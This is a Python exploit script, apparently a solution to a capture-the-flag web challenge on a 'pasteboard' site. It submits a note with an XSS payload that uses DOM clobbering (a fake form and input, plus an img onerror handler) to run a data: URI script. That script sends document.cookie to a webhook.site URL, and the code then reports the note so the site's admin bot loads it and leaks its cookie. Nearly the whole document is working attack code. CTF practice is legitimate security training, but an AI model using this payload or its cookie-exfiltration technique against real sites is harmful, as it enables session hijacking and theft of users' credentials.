import requests
import time

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Same working payload but with document.cookie
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/COOKIE.js?c='+encodeURIComponent(document.cookie))"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[*] Getting document.cookie with data: URI...")

time.sleep(2)  # Wait a bit in case of rate limit

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Cookie", "body": payload},
    allow_redirects=False
)

print(f"[*] Response: {resp.status_code}")

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Note: {note_url}")
    
    time.sleep(1)
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    print(f"[*] Report: {report.status_code}")
    
    if report.status_code == 202:
        print()
        print("[!] CHECK WEBHOOK FOR /COOKIE.js?c=<FLAG>")
        print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")